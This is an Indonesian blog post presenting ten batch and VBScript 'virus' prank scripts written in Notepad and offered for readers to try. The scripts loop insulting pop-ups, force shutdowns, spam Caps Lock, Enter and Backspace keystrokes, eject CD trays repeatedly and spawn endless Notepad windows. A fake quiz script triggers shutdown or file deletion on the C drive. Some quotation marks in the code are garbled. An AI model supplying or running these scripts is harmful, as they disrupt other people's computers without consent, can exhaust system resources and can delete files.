Cara membuat Virus Sederhana Di Notepad







1. Cara bikin Virus Dengan Notepat
@ECHO off
:Begin
msg * Jontor Virus Beraksi
msg * Muka lo jelek - ngaca dulu gih
msg * hayo lo,cupu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
save namafile.BAT (ekstensi filenya harus .BAT) Simpan dalam notepat.


2. Cara membuat shutdown+message
Code:
[i]@echo off
msg * apaan sih lo
shutdown -s -c “Error! muka mu standar abis”
save namafile.BAT (ekstensi filenya harus .BAT) Simpan dalam notepat.



3. Cara Mainin Caps Lock button
Code:
[i]Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
save namafile.vbs[/i] (save dengan Ekstensi file .vbs) simpan dalam notepat.






4. Cara buka tutup CD/DVD
[i]Code:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
save namafile.vbs[/i] (save dengan Ekstensi file .vbs) simpan dalam notepat.




5. Cara bikin vbscript nongol mlulu
Code:
[i]Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
save namafile.vbs ket:di task manager full wscript yg lg running [/i]





6. Cara bikin teken tombol backspace melulu
Code:
[i]MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
save namafile.vbs [/i] simpan di dalam notepat




7. Cara bikin otomatis ngetik “lu jelek banget sih” di notepad/word
Code:
[i]Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “lu jelek banget sih!!!”
loop
save namafile.vbs simpan di dalam notepat



8. Cara bikinbuka notepad trus menerus
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save namafile.BAT
ket:termasuk yang ngeselin banget nih
bisa di ganti,terserah mau buka cmd ato buka yg lain..ganti aja dir nya.
[/i]




9. Cara bikin otomatis buka notepad lalu ngetik apa yg lo mau
Code:
[i]WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “mu “
WScript.Sleep 50
WshShell.SendKeys “je”
WScript.Sleep 50
WshShell.SendKeys “le”
WScript.Sleep 50
WshShell.SendKeys “k “
WScript.Sleep 50
WshShell.SendKeys ” se”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “li”
WScript.Sleep 50
WshShell.SendKeys ” y”
WScript.Sleep 50
WshShell.SendKeys “a”
WScript.Sleep 50
WshShell.SendKeys ” h”
WScript.Sleep 50
WshShell.SendKeys “!”
WScript.Sleep 50
WshShell.SendKeys “!! “
save namafile.vbs
ket:
ini salah satu script favorit gw…
[/i][i]10.@echo off
title quiz hari ini
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top[/i]

Nah code-code di atas adalah kumpulan Script-script Jail Paling Mantep yang saya miliki, selamat mencoba dan semoga berhasil 

0 komentar:

Poskan Komentar